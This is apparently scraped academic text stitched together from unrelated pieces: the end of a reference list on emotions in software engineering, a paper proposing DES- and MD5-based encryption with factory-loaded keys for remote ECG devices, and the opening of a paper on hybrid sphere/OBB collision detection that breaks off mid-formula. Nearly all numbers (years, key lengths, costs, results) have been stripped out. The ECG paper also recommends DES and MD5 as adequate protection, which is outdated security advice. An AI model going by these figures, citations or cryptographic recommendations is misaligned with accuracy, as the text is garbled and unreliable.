johnson p, ekstedt m, jacobson i. . where's the theory for software engineering? ieee software ( ): – doi . /ms. . .
kasurinen j, laine r, smolander k. . how applicable is iso/iec in game software development? in: heidrich j, oivo m, jedlitschka a, baldassarre mt, eds. th international conference on product-focused software process improvement (profes ), lecture notes in computer science, vol. . berlin heidelberg: springer, – .
khan ia, brinkman w, hierons rm. . do moods affect programmers' debug performance? cognition, technology & work ( ): – doi . /s - - - .
kitchenham ba, pfleeger sl, pickard lm, jones pw, hoaglin dc, emam ke, rosenberg j. . preliminary guidelines for empirical research in software engineering. ieee transactions on software engineering ( ): – doi . /tse. . .
klein hk, myers md. . a set of principles for conducting and evaluating interpretive field studies in information systems. mis quarterly : – doi . / .
kleinginna pr, kleinginna am. . a categorized list of emotion definitions, with suggestions for a consensual definition. motivation and emotion : – doi . /bf .
langley a. . strategies for theorizing from process data. the academy of management review ( ): – doi . / .
lenberg p, feldt r, wallgren l-g. . towards a behavioral software engineering. in: proceedings of the th international workshop on cooperative and human aspects of software engineering (chase ). new york: acm press, – .
lenberg p, feldt r, wallgren lg. . behavioral software engineering: a definition and systematic literature review. journal of systems and software : – doi . /j.jss. . . .
lesiuk t. . the effect of music listening on work performance. psychology of music ( ): – doi . / .
lewin k. . the research center for group dynamics at massachusetts institute of technology. sociometry ( ): – doi . / .
locke ea. . toward a theory of task motivation and incentives. organizational behavior and human performance ( ): – doi . / - ( ) - .
locke ea, latham gp. . new directions in goal-setting theory. current directions in psychological science : – doi . /j. - . . .x.
lyubomirsky s, king l, diener e. . the benefits of frequent positive affect: does happiness lead to success? psychological bulletin ( ): – doi . / - . . . .
mcrae k, ochsner kn, mauss ib, gabrieli jjd, gross jj. . gender differences in emotion regulation: an fmri study of cognitive reappraisal. group processes & intergroup relations ( ): – doi . / .
meyer an, fritz t, murphy gc, zimmermann t. . software developers' perceptions of productivity. in: proceedings of the nd acm sigsoft international symposium on foundations of software engineering (fse ). new york: acm press, – doi . / . .
miner ag, glomb tm. . state mood, task performance, and behavior at work: a within-persons approach. organizational behavior and human decision processes ( ): – doi . /j.obhdp. . . .
mohr lb. . explaining organizational behavior. san francisco: jossey-bass inc.
muchinsky pm. . emotions in the workplace: the neglect of organizational behavior. journal of organizational behavior ( ): – doi . / - ( ) : < ::aid-job > . .co; -a.
müller sc, fritz t. . stuck and frustrated or in flow and happy: sensing developers' emotions and progress. in: ieee/acm th ieee international conference on software engineering, florence, italy. piscataway: ieee, – doi . /icse. . .
nolen-hoeksema s. . emotion regulation and psychopathology: the role of gender. annual review of clinical psychology ( ): – doi . /annurev-clinpsy- - .
nolen-hoeksema s, aldao a. . gender and age differences in emotion regulation strategies and their relationship to depressive symptoms. personality and individual differences ( ): – doi . /j.paid. . . .
oed online. . vision, n. oxford: oxford university press. available at http://www.oed.com/view/entry/ .
ortony a, clore gl, collins a. . the cognitive structure of emotions. st edition. new york: cambridge university press.
osterweil l, ghezzi c, kramer j, wolf a. . determining the impact of software engineering research on practice. computer (march): – doi . /mc. . .
parkinson b, briner r, reynolds s, totterdell p. . changing moods: the psychology of mood and mood regulation. st edition. london: addison-wesley longman.
petersen k. . measuring and predicting software productivity: a systematic map and review. information and software technology ( ): – doi . /j.infsof. . . .
pfeffer j. . reviewed work: explaining organizational behavior. by lawrence b. mohr. administrative science quarterly ( ): doi . / .
plutchik r, kellerman h. . emotion, theory, research, and experience. vol. . london: academic press.
rindova v. . editor's comments: publishing theory when you are new to the game. academy of management review ( ): – doi . /amr. . .
runeson p. . using students as experiment subjects – an analysis on graduate and freshmen student data. in: proceedings th international conference on empirical assessment & evaluation in software engineering, – .
russell ja. . culture and the categorization of emotions. psychological bulletin ( ): – doi . / - . . . .
russell ja. . core affect and the psychological construction of emotion. psychological review ( ): – doi . / - x. . . .
russell ja. . emotion, core affect, and psychological construction. cognition & emotion ( ): – doi . / .
russell ja, barrett lf. . core affect, prototypical emotional episodes, and other things called emotion: dissecting the elephant. journal of personality and social psychology ( ): – doi . / - . . . .
salman i, misirli at, juristo n. . are students representatives of professionals in software engineering experiments? in: ieee/acm th ieee international conference on software engineering, florence, italy. piscataway: ieee, – doi . /icse. . .
sampaio scdb, barros ea, aquino jr gs, silva mjc, meira srdl. . a review of productivity factors and strategies on software development. in: fifth international conference on software engineering advances, – .
schwarz n. . feelings as information: informational and motivational functions of affective states. in: higgins et, sorrentino rm, eds. handbook of motivation and cognition: foundations of social behavior, vol. . new york: guilford press, – , chapter .
schwarz n, clore gl. . mood, misattribution, and judgments of well-being: informative and directive functions of affective states. journal of personality and social psychology ( ): – doi . / - . . . .
shockley km, ispas d, rossi me, levine el. . a meta-analytic investigation of the relationship between state affect, discrete emotions, and job performance. human performance ( ): – doi . / . . .
squires a. . methodological challenges in cross-language qualitative research: a research review. international journal of nursing studies ( ): – doi . /j.ijnurstu. . . .
strauss a, corbin j. . grounded theory methodology. in: denzin nk, lincoln ys, eds. handbook of qualitative research. thousand oaks: sage publications inc, – .
svahnberg m, aurum a, wohlin c. . using students as subjects—an empirical evaluation. in: proceedings of the second acm/ieee international symposium on empirical software engineering and measurement. piscataway: ieee, – .
tichy w. . hints for reviewing empirical work in software engineering. empirical software engineering ( ): – doi . /a: .
van nes f, abma t, jonsson h, deeg d. . language differences in qualitative research: is meaning lost in translation? european journal of ageing ( ): – doi . /s - - -y.
wagner s, ruhe m. . a systematic review of productivity factors in software development. in: nd international workshop on software productivity analysis and cost estimation (space ). iscas–sklcs– – , beijing, china.
walsham g. . doing interpretive research. european journal of information systems : – doi . /palgrave.ejis. .
watson d, clark la, tellegen a. . development and validation of brief measures of positive and negative affect: the panas scales. journal of personality and social psychology ( ): – doi . / - . . . .
wegge j, dick rv, fisher gk, west ma, dawson jf. . a test of basic assumptions of affective events theory (aet) in call centre work. british journal of management ( ): – doi . /j. - . . .x.
weick ke. .
what theory is not, theorizing is. administrative science quarterly ( ): – doi . / .
weiss hm, beal dj. . reflections on affective events theory. in: ashkanasy n, zerbe w, härtel c, eds. the effect of affect in organizational settings (research on emotion in organizations, volume ). st edition. emerald group publishing limited, – , chapter doi . /s - ( ) - .
weiss h, cropanzano r. . affective events theory: a theoretical discussion of the structure, causes and consequences of affective experiences at work. research in organizational behavior ( ): – .
wrobel mr. . emotions in the software development process. in: th international conference on human system interactions (hsi), faculty of electronics, telecommunications and informatics, gdansk university of technology, gdansk, poland. piscataway: ieee, – doi . /hsi. . .
yeager lb. . henry george and austrian economics. american journal of economics and sociology ( ): – doi . / - . .

international journal of advanced network, monitoring and controls, volume , no. ,

remote ecg system data encryption scheme

liu xin, college of information science and engineering, ocean university of china, qingdao, china, e-mail: liuxinouc@ .com
wei zhiqiang, college of information science and engineering, ocean university of china, qingdao, china

abstract—the remote ecg system communicates over the public internet, whose security is not sufficient by itself to ensure the information security of the system, so disclosure of user data poses a security threat. the ecg information security solution proposed in this paper presets multiple keys per machine at the factory to avoid leakage caused by personnel factors, and uses a hash function to generate a secondary key for communication encryption during network transmission. experiments show that this scheme can effectively resist existing attack methods and fully protect patient data security.

keywords-remote ecg system; multi-key-per-machine

i. introduction

in a remote ecg system, the terminals are distributed among a vast number of families, clinics, community hospitals, and so on, which creates problems in managing the physical equipment. since the ecg data is communicated through the internet, the communication packets can be intercepted and monitored. due to the diversification of commercial channels and construction teams, there is also a risk that technical secrets leak.
this paper proposes a data encryption mechanism for remote ecg systems that uses a random number generator to produce keys too long and random to be memorized, establishes a multi-key model, and implements encrypted storage and secure communication with periodic key replacement. the core design concept of this scheme is that people, as keepers of secrets, are themselves a key factor in leaks; if every step of encryption is implemented by an automatic algorithm and human factors are completely eliminated, patient data can still be effectively protected even in the presence of the security management vulnerabilities described above.

ii. design of information security scheme for remote ecg system

the key protocol developed in this paper contains mechanisms for key generation, storage, deployment, and verification. the scheme takes into account various attacks such as brute-force cracking and interception of network communication packets.

a. hardware risk control scheme

the hardware of the device may be disassembled and the data on the storage device taken out. if an attacker can obtain two devices of the same model, the key content can be learned by comparing their contents. a common hardware attack is wiretapping; for example, a logic analyzer can record and analyze the timing of signals on the memory bus of the storage device. practice has proved that ordinary memory devices, such as nor flash chips, nand flash chips, or i²c-bus serial memories, cannot resist wiretap attacks. therefore, we must use a tamper-resistant security module (trsm) to store the encryption keys. in theory, pure software encryption cannot guarantee the security of the key when there is a possibility that the hardware is disassembled. this solution uses a trsm with a capacity of k bytes, which costs about $ . , so the cost increase for the entire device is negligible.

b. research on key agreement of multi-key-per-machine

a multi-key-per-machine encryption algorithm is used to encrypt patient data in the terminal device memory. patient data can be sent to the cloud very quickly, but the device must also work in an off-network state, so local storage is still an indispensable feature. considering that the terminal equipment has to handle many tasks, such as writing to memory, waveform drawing, network communication, alarms, and other urgent processing, the encryption algorithm should not be overly complex. the key point of prevention is to stop attackers from cracking same-model devices in bulk. therefore, the central issues are the key design and the key storage.

c. key design

user data (patient ecg data) is encrypted using a block cipher scheme. a block cipher is also called a symmetric cipher.
when encrypting plaintext with a block cipher, the plaintext is first split into groups of equal length, and each group is then encrypted separately to obtain ciphertext of the same length. a block cipher is characterized by the encryption key being the same as the decryption key. this scheme adopts the des encryption standard: the block length is bits and the key length is also bits, of which some bits are parity bits, so the effective key length is bits. although des has been superseded by aes, its strength is sufficient for this application and its computational complexity is lower than that of aes; the field multiplications that aes requires are too computationally intensive for embedded processors and are not suitable for encrypting ecg data streams collected in real time.

d. key security strength

considering the possibility that the device-side key is forcibly cracked by an attacker, a mechanism for periodically changing the key can be adopted. in general, the life of an electrocardiograph is years. if the key is changed once a month, keys are needed, for a total of bytes. the cloud server's cost of storing million groups of lifetime keys is m, which is still affordable.

e. key generation

the keys on each terminal device are composed as follows: random numbers are stored as a key sequence with a total length of bytes. the server can generate a random number sequence of length m at a time and then sequentially slice off bytes for each device. the device's keys and the offset of its key sequence within the server-side master key are recorded in the device's secure memory. the server records the product serial number of each device and the corresponding random number sequence index value. as long as the random numbers are guaranteed not to be copied by insiders during manufacturing, the security of the keys can be ensured.

f. key deployment

the device should have a secure memory (trsm) with a capacity of k. the user data encryption keys for the full product life ( -byte-long random numbers) are loaded into the machine's secure memory in one pass when the machine is shipped from the factory. if the device remains in use beyond its planned service life, these keys can be reused in a rolling loop. the device does not update the keys after it leaves the factory, preventing the keys from being intercepted by an attacker during delivery. after the device leaves the factory, it is never necessary to transfer the user data encryption keys under any condition, which eliminates the possibility of the key packets being intercepted.

g. key verification

the main purpose of key verification is to test whether the encryption-related hardware and software are defective. after the machine is assembled, the key values in the secure memory are read out, and the md5 value of the keys is calculated and sent to the cloud server along with the product serial number. if the server-side verification succeeds, the keys can be considered to have been deployed correctly. if md5 collisions are a concern, all device keys can be pre-computed on the server side in advance and any key segments with duplicate md5 values deleted; in theory, the probability of such a collision is extremely small.
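as an illustration of this verification step, a minimal sketch follows. the paper publishes no code, so the file layout, function names, and the use of python's hashlib module are assumptions made purely for illustration.

```python
import hashlib

def key_store_digest(key_store_path):
    """Read the factory-loaded key sequence (a copy of the TRSM contents)
    and return its MD5 digest as a hex string."""
    with open(key_store_path, "rb") as f:
        key_bytes = f.read()              # the device's full lifetime key sequence
    return hashlib.md5(key_bytes).hexdigest()

def verification_message(serial_number, key_store_path):
    """Bundle the product serial number and the key-store digest into the
    message sent to the cloud server right after assembly."""
    return {"serial": serial_number, "key_md5": key_store_digest(key_store_path)}

# hypothetical usage: the server compares the received digest with the digest
# it pre-computed for this serial number when the key sequence was generated.
# msg = verification_message("EC-000123", "/secure/keystore.bin")
```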
h. key synchronization

through the above steps, the same user data encryption key sequence is deployed on the terminal device and the cloud server, but how the two sides stay in step is still a problem. ideally, using a timestamp as the synchronization parameter would be the best solution: the two parties could agree that, starting from the date of leaving the factory, the natural month is used as the granularity and a new key is switched in every natural month. the problem is that, in the actual use environment, the time accuracy of the device side cannot be guaranteed. on the one hand, rtc (real-time clock) devices based on quartz crystal oscillators do not achieve such precision, and some devices run faster than others. on the other hand, rtc backup power failures are difficult to avoid, and a device cannot be abandoned just because its clock is inaccurate. furthermore, if the user is allowed to adjust the device time, an attacker can take advantage of this adjustment to observe future ciphertext forms in advance, which would be a significant security hole.

when the device is networked, the server can know how many times keys have been used on the terminal device. when the server finds that the terminal is consuming keys too slowly, so that the pre-stored keys would not all be used within the product life cycle, the maximum-key-used-times value can be reduced through the key agreement protocol. first, a temporary communication key for modifying the maximum-key-used-times value is negotiated using the diffie-hellman key exchange protocol. a large prime q and a generator element p of the multiplicative group of the finite field $F_q$ are pre-agreed between the server and the device; q and p are written into the device's trsm at the factory. the algorithm for generating the temporary communication key k is as follows:

1) the server generates a random number x, calculates $a = p^x \bmod q$, and sends it to the terminal;
2) the terminal generates a random number y, calculates $b = p^y \bmod q$, and sends it to the server;
3) the terminal calculates $k = a^y \bmod q$, and the server calculates $k = b^x \bmod q$; both values equal $p^{xy} \bmod q$, so the two k values are equal.

in this way, the server and the terminal share the random number k as a temporary communication key for modifying the maximum-key-used-times value, and an eavesdropper cannot read the communication content. even if the content could be cracked, it is only an index value, and the keys themselves cannot be derived from it. the server should record the timestamp of each modification of the maximum-key-used-times value to avoid modifying it too frequently; limiting modifications to a few per month is enough. when the hardware can ensure the security of the keys, changing the key very frequently is not necessarily meaningful.
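the diffie-hellman negotiation above can be sketched as follows. this is a minimal illustration using python's built-in pow() for modular exponentiation; the tiny placeholder prime and generator, the variable names, and the absence of message authentication are simplifications for illustration only, not part of the paper's protocol.

```python
import secrets

# q (large prime) and p (generator) are pre-agreed and written into the TRSM
# at the factory; the values below are placeholders far too small for real use.
Q = 4294967291            # a prime, but only a stand-in for a large safe prime
P = 5                     # assumed generator for the example

def dh_public(secret):
    """Value exchanged over the network: p^secret mod q."""
    return pow(P, secret, Q)

def dh_shared(peer_public, secret):
    """Temporary communication key k = peer_public^secret mod q."""
    return pow(peer_public, secret, Q)

x = secrets.randbelow(Q - 2) + 1      # server-side secret
y = secrets.randbelow(Q - 2) + 1      # terminal-side secret
A, B = dh_public(x), dh_public(y)     # A goes to the terminal, B to the server
assert dh_shared(B, x) == dh_shared(A, y)   # both sides now hold the same k
```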
iii. data compression upload scheme design

channel eavesdropping is a common attack method; in the internet environment, it is easy to intercept communication packets on the line by means of a route bypass. the scheme therefore compresses the data and then encrypts it before transmission, as shown in fig. , which further increases the attacker's difficulty while reducing the network load. after a cracker obtains a message, the compressed file could be recovered by exhaustive search; but since the key used for the second encryption is different, the original data inside the compressed file would have to be cracked again. a legitimate cloud server stores the original keys from the factory, so it can easily calculate the compression key from the original keys. conversely, since the hash function is irreversible, it is not feasible to derive the original keys from the compression key, and an attacker can only resort to exhaustive search.

figure . two encryption processes

both ciphers in fig. use the des algorithm. the hash function uses the md5 algorithm. md5 requires a -byte input block to generate a -byte output. in order to meet the input requirement of md5, consecutive keys in the key queue are taken as a parameter group; after a key expires and the next key is switched in, the parameter group is advanced and used in turn. data compression could use shannon coding or huffman coding, but today there are many mature methods available and there is no need to reinvent the wheel for a small performance gain. we used two classical algorithms to compress a m data file; the performance is shown in table i. it can be seen that de-duplicating the data and then compressing it gives the highest compression ratio, which is beneficial for network transmission. the ecg machine generates about . m of data per minute, and the compression takes less than seconds, which is equivalent to / processor occupancy, a burden the system can fully withstand.

table i. classic compression algorithm performance test (compression ratio and time consumed in seconds):
gzip (compression): . %
dedup (remove duplicates): . %
first gzip and then dedup: . %
first dedup and then gzip: . %
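a minimal sketch of the two-stage process in fig. is given below. the paper names no implementation, so the choices here (zlib for the gzip-style compression, hashlib for md5, the pycryptodome des primitive, and ecb mode with simple padding) are assumptions made only to show the data flow: derive a secondary key by hashing a group of consecutive original keys, compress, then encrypt.

```python
import hashlib
import zlib
from Crypto.Cipher import DES            # pycryptodome, assumed available
from Crypto.Util.Padding import pad

def derive_secondary_key(original_keys: bytes) -> bytes:
    """Hash a parameter group of consecutive original keys with MD5 and keep
    the first 8 bytes as the DES key for the transmission-side encryption."""
    return hashlib.md5(original_keys).digest()[:8]

def compress_then_encrypt(ecg_record: bytes, original_keys: bytes) -> bytes:
    """Compress the ECG record, then DES-encrypt it with the derived key."""
    compressed = zlib.compress(ecg_record)
    key = derive_secondary_key(original_keys)
    cipher = DES.new(key, DES.MODE_ECB)  # mode is not specified in the paper
    return cipher.encrypt(pad(compressed, DES.block_size))

# hypothetical usage with a 64-byte parameter group taken from the device's
# pre-loaded key sequence:
# packet = compress_then_encrypt(one_minute_of_ecg, key_sequence[0:64])
```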
"a robust and reusable ecg-based authentication and data encryption scheme for ehealth systems." global communications conference ieee, : - . [ ] quang, do vinh, t. n. k. hoan, and i. koo. "energy-efficient data encryption scheme for cognitive radio networks." ieee sensors journal pp. ( ): - . [ ] liang, kaitai, et al. "an efficient cloud-based revocable identity- based proxy re-encryption scheme for public clouds data sharing." european symposium on research in computer security springer, cham, : - . [ ] xu, lei, x. wu, and x. zhang. "cl-pre:a certificateless proxy re- encryption scheme for secure data sharing with public cloud." acm symposium on information, computer and communications security acm, : - . [ ] gillies, alan. "improving the quality of information security management systems with iso ." tqm journal . ( ): - . [ ] publishing, it governance. iso and information security: a combined glossary. it governance ltd, . [ ] wang, chi hsiang, and d. r. tsai. "integrated installing iso and iso management systems on an organization." international carnahan conference on security technology ieee, : - . international conference on sensor network and computer engineering (icsnce ) research on bounding volume boxes collision detection algorithm in virtual reality technology wan chao school of computer science and engineering xi’an technological university xi'an of shaanxi province, china e-mail: @qq.com liu pingping, hong bo school of computer science and engineering xi’an technological university xi'an of shaanxi province, china e-mail: @qq.com abstract—this paper take the development of virtual campus roaming system as an example. aiming at the defects of the different kinds of bounding boxes collision detection technology, analyzes the advantages of the hybrid hierarchical bounding box collision detection algorithm based on spheres and oriented bounding box, and described the way to construct it. finally, the algorithm is tested in the vc and unity d engine, a good result is obtained. keywords-vr technology; bounding volume boxes; collision detection; unity d i. introduction virtual reality (vr) is a comprehensive technology integrating computer graphics, multimedia technology and many other technologies. its purpose is to simulate the scene in reality. as an open platform, it has three characteristics: interactivity, conceptualization, and immersion [ ]. in order to ensure the sense of the environment, the objects in the scene must have the corresponding physical properties. at the same time, the user will not penetrate the object in various operations, and can truly feel the occurrence of a collision. so collision detection technology has a very important position in the vr technology [ ]. collision detection technology is developing continuously, and some classic collision detection algorithms are widely used. such as aabb (aligned axis bounding box), spheres, obb (oriented bounding box), etc. these methods are applicable to objects with different geometric features, so their simplicity of detection is not ideal. some scholars have proposed a hybrid bounding box algorithm for the reason. an algorithm similar to obb-spheres is formed. in continuous collision detection, some scholars proposed a subspace based algorithm, which effectively improved the speed and accuracy of continuous collision detection. ii. 
ii. basic principle of collision detection

the construction of a virtual campus roaming system uses collision detection technology, real-time rendering technology, environment modeling technology, and so on. collision detection ensures the realism of the whole system and forms the basis of the user experience, giving the user a sense of immersion in the virtual scene. collision detection adds colliders to the objects in the scene to increase the sense of authenticity and prevents characters from passing through walls; a person partially overlapping an object in a scene is obviously incompatible with the logic of real life [ ]. the basic principle can be stated as follows: consider a virtual three-dimensional space with n objects. its three-dimensional geometric coordinate system together with the time variable constitutes a four-dimensional coordinate system, denoted $C_W$. the path formed by the motion of the $i$-th object constitutes a subset of $C_W$, denoted $C_i$ ($1 \le i \le n$). collision detection determines whether the $i$-th object intersects the $j$-th object, that is, whether $C_i \cap C_j$ is empty.

for the detection of object collisions, unity provides a good test platform: you can create two virtual geometries, give each a collider, and then detect the collision between them. it is also possible to create two empty objects, add two specific colliders to them, and test the collisions between the colliders directly; in addition, you can create an object and a ray that simulates casting a ray onto the object. these correspond to the three kinds of collision detection strategies in unity, called basic collision detection, trigger collision detection, and ray casting [ ].

iii. hybrid hierarchical bounding box based on bounding spheres and oriented bounding boxes

a. bounding box technology

there are many kinds of bounding boxes. some classical methods include spheres, aabb (axis-aligned bounding box), obb (oriented bounding box), and so on [ ]. here we mainly introduce spheres and obb.

1) spheres: the bounding sphere is a relatively simple bounding box with poor tightness. as the outer sphere of a geometric object, it produces too much redundant space for concave objects, so false positives can occur: the bounding spheres may report a collision even though the enclosed objects do not actually touch. to illustrate the construction process, assume the geometric object is e, and let se denote the set of all the most basic geometric elements (such as triangles and circles) in the object. the calculation of the bounding sphere is simpler than that of the other bounding boxes: the average of the center coordinates of all the elements in se (the intersection of the angle bisectors for a triangle, the center for a circle) gives the center of the bounding sphere, denoted c(x, y, z). then the distances between the center and each basic geometric element of e are compared, and the maximum value is the radius of the bounding sphere, denoted r. thus, far fewer parameters are required to record a sphere than for the other bounding boxes: a sphere is given just by its center ( parameters) and its radius ( parameters).
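a minimal sketch of this construction, assuming the object is supplied as a list of triangles and using numpy for the vector arithmetic, is shown below. note one simplification: the element "center" is taken here as the triangle centroid, whereas the text above uses the intersection of the angle bisectors (the incenter); the function names are illustrative only.

```python
import numpy as np

def bounding_sphere(triangles):
    """Build a bounding sphere for an object E given as an (n, 3, 3) array of
    triangles: center = mean of the element centers, radius = distance from
    that center to the farthest vertex."""
    tris = np.asarray(triangles, dtype=float)     # shape (n, 3, 3)
    centers = tris.mean(axis=1)                   # per-triangle centroid
    c = centers.mean(axis=0)                      # sphere center C(x, y, z)
    verts = tris.reshape(-1, 3)
    r = np.linalg.norm(verts - c, axis=1).max()   # sphere radius R
    return c, r

def spheres_intersect(c1, r1, c2, r2):
    """Sphere-sphere intersection test (see the inequality below):
    the spheres intersect iff |S1S2| <= r1 + r2."""
    return np.linalg.norm(np.asarray(c1) - np.asarray(c2)) <= r1 + r2
```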
the intersection test between bounding spheres is relatively simple: it is only necessary to compare the distance between the two sphere centers with the sum of their radii. specifically, assume the centers and radii of the two bounding spheres are $S_1(x_1, y_1, z_1)$, $r_1$ and $S_2(x_2, y_2, z_2)$, $r_2$. if $|S_1 S_2| \le r_1 + r_2$, the two bounding spheres intersect; otherwise they do not. written out in full, this inequality is

$\sqrt{(x_1 - x_2)^2 + (y_1 - y_2)^2 + (z_1 - z_2)^2} \le r_1 + r_2$

because a sphere is invariant under rotation, the parameters that describe it do not change as the enclosed geometric object rotates through any angle, and the object never leaves the sphere. therefore, when an object of fixed shape moves, the bounding sphere's radius need not be recalculated; only the center coordinates need to be translated accordingly. for an object whose shape changes, however, both the center and the radius must be recalculated, so the real-time behavior of bounding-sphere collision detection is poor for deforming objects.

2) obb (oriented bounding box): an obb is the smallest rectangular box that contains a geometric object and may have any orientation in the coordinate system. the key to constructing an obb is finding the best orientation of the box and determining the minimum extents along each axis. compared with the bounding sphere, the construction of an obb is considerably more involved; the concrete method is as follows. given a geometric object, denoted g to distinguish it from the object e above, let sg again denote the set of all its most basic geometric elements. for simplicity, assume all basic elements of the object are triangles and that there are n of them, with the three vertices of the $i$-th triangle recorded as $a_i$, $b_i$, and $c_i$ (all treated as one-dimensional vectors). the mean $\mu$ of the set sg and the covariance entries $C_{jk}$ are evaluated as

$\mu = \frac{1}{3n} \sum_{i=1}^{n} (a_i + b_i + c_i)$

$C_{jk} = \frac{1}{3n} \sum_{i=1}^{n} \left( \bar{a}_i^{\,j} \bar{a}_i^{\,k} + \bar{b}_i^{\,j} \bar{b}_i^{\,k} + \bar{c}_i^{\,j} \bar{c}_i^{\,k} \right), \quad j, k \in \{1, 2, 3\}$

where $\bar{a}_i = a_i - \mu$, $\bar{b}_i = b_i - \mu$, $\bar{c}_i = c_i - \mu$, $\mu$ is a one-dimensional vector, each $C_{jk}$ is a scalar, and the symmetric matrix with entries $C_{jk}$ is denoted c. the resulting matrix c is a real symmetric matrix, and the eigenvectors corresponding to its eigenvalues are mutually orthogonal. normalizing the three eigenvectors yields an orthonormal basis, which forms the three axes of the obb, so the best orientation of the obb is determined. what remains is to determine the extents of the obb along each axis: it suffices to project the vertices of every basic geometric element in sg onto the three axes just obtained; the minimum and maximum projections on each axis give the required extents. from the above description, the structure of an obb is quite complicated and its description requires more parameters: a total of numbers are needed, of which numbers describe the three axes (each axis is a one-dimensional vector of three components) and the remaining numbers give the extent of the obb along the corresponding axis.
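the covariance-based construction can be sketched as follows, again assuming the object g is supplied as an array of triangles; numpy's symmetric eigendecomposition provides the three orthogonal axes, and the extents come from the minimum and maximum projections. this is a generic sketch of the standard procedure under those assumptions, not the authors' code.

```python
import numpy as np

def build_obb(triangles):
    """Construct an OBB for an object G given as an (n, 3, 3) array of
    triangle vertices a_i, b_i, c_i. Returns center, axes (rows), half-extents."""
    verts = np.asarray(triangles, dtype=float).reshape(-1, 3)
    mu = verts.mean(axis=0)                      # mean of all vertices
    d = verts - mu
    C = (d.T @ d) / len(verts)                   # 3x3 covariance matrix
    _, eigvecs = np.linalg.eigh(C)               # orthonormal eigenvectors (columns)
    axes = eigvecs.T                             # rows are the OBB axes
    proj = d @ axes.T                            # vertex coordinates along each axis
    lo, hi = proj.min(axis=0), proj.max(axis=0)
    center = mu + axes.T @ ((lo + hi) / 2.0)     # box center in world coordinates
    half_extents = (hi - lo) / 2.0
    return center, axes, half_extents
```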
the obb constructed by the above method has high tightness because its basis can take an arbitrary orientation, and when the object moves or rotates, the obb's orientation and extents can be updated with it quickly, without recomputing the box from scratch.

b. model constructing

three-dimensional modeling of the virtual campus means three-dimensional modeling of the terrain, roads, buildings, plants, and other objects around the campus. the main work of 3d modeling is to collect, collate, classify, and preprocess the basic geographic information for the objects to be modeled. the underlying technologies involved are polygonal modeling and texture mapping [ ]. in traditional 3d scene building, the various objects in a scene have different geometric representations because of their different shapes and precision requirements; the most commonly used representations at present are the surface model and the polygon mesh model. in the campus roaming system, the polygon mesh model is usually used because the objects in the scene mostly have edges and corners. polygonal models build the shape of a model from the most basic points and lines, then assign the corresponding material to the object's surface and add an illumination model to increase its realism. texture mapping is used to add the material: a two-dimensional image representing the surface texture of an object is mapped onto the surface of the three-dimensional object. the basic idea is to map the coordinates of the texture pattern to the geometric coordinates of the vertices of the 3d model in a certain way, then map the points on the geometric object onto the screen, and finally display them, as shown in figure .

figure . texture map

c. construction of hierarchical encircling box tree

the roaming system is a continuous loop that, through logical judgment, draws every frame displayed to the user, as shown in figure . to improve the speed and real-time performance of collision detection, a traditional single bounding-box algorithm cannot achieve the desired result, and the hybrid bounding-box algorithm solves this problem [ ].

figure . system running process

a hierarchical bounding box tree is a tree structure whose nodes are bounding volumes. as introduced above, the obb has better tightness and is faster to update when the object is displaced or rotated, but its intersection test is difficult and slow; the bounding sphere has poor tightness, but its intersection test is simple and fast, and it can be updated faster than the obb. combining the advantages of the two, both are selected here. the bounding sphere is used at the root nodes of the bounding box tree because its intersection test is simple and fast, so it can quickly eliminate a large number of pairs that are easily judged to be disjoint. there are two main ways to construct a bounding box tree. the bottom-up way takes the basic geometric elements of an object as leaf nodes and recursively merges them until the final root node is formed; the top-down method is the opposite, recursively partitioning from the root node down to the leaf nodes. a top-down method is used here to construct the hierarchical bounding box tree because the construction technique is mature and widely used, as shown in figure .

figure . the top-down bounding box tree

when building a bounding box tree, one must consider whether it is built statically or dynamically [ ]. with a static structure, the bounding box tree must be rebuilt once the object changes shape or moves; with a dynamic structure, it does not need to be rebuilt as the object changes. although the dynamic structure is more flexible than the static one, it must modify node data in real time, its stability is weaker, and the real-time performance of the updates is hard to guarantee. we use the static structure, which has high stability, to build the bounding box tree, because the objects in the virtual campus roaming system are mostly static and do not change when they collide.
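how the two levels can cooperate at query time is sketched below: the cheap sphere test prunes clearly separated pairs, and only the surviving pairs pay for the full separating-axis test between obbs. the obb representation matches the construction sketch above; this is an illustrative reading of the hybrid scheme under those assumptions, not the authors' implementation.

```python
import numpy as np
from itertools import product

def obb_overlap(c1, axes1, e1, c2, axes2, e2, eps=1e-9):
    """Separating-axis test for two OBBs given as (center, 3x3 row axes,
    half-extents). Returns True when no separating axis exists."""
    t = np.asarray(c2, float) - np.asarray(c1, float)
    candidates = list(axes1) + list(axes2) + \
                 [np.cross(a, b) for a, b in product(axes1, axes2)]
    for axis in candidates:
        n = np.linalg.norm(axis)
        if n < eps:                      # parallel edges give a degenerate axis
            continue
        axis = axis / n
        r1 = np.sum(e1 * np.abs(axes1 @ axis))
        r2 = np.sum(e2 * np.abs(axes2 @ axis))
        if abs(t @ axis) > r1 + r2:      # projection gap found => separated
            return False
    return True

def hybrid_intersect(node_a, node_b):
    """Two-level hybrid test: bounding-sphere pre-test, then OBB SAT test.
    Each node is a dict with 'sphere' = (center, radius) and
    'obb' = (center, axes, half_extents)."""
    (ca, ra), (cb, rb) = node_a["sphere"], node_b["sphere"]
    if np.linalg.norm(np.asarray(ca) - np.asarray(cb)) > ra + rb:
        return False                     # cheap rejection at the outer level
    return obb_overlap(*node_a["obb"], *node_b["obb"])
```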
iv. system application and test results

to verify that the algorithm handles collision detection between objects with different geometric features well, an initial test was carried out. a teapot and a cylinder were used for the collision test; the teapot is made up of triangles and vertices, and the cylinder of triangles and vertices, so their complexity meets the requirements of the test. a double bounding box was constructed over the vertices of the two objects, organized as binary trees: the outer layer of each node holds a bounding sphere, and the inner layer holds an obb and a sphere bounding box respectively. the algorithm was compared with rapid, a collision detection algorithm based on obb bounding boxes, using the evaluation function of collision detection algorithms

$T = N_v C_v + N_p C_p + N_u C_u$

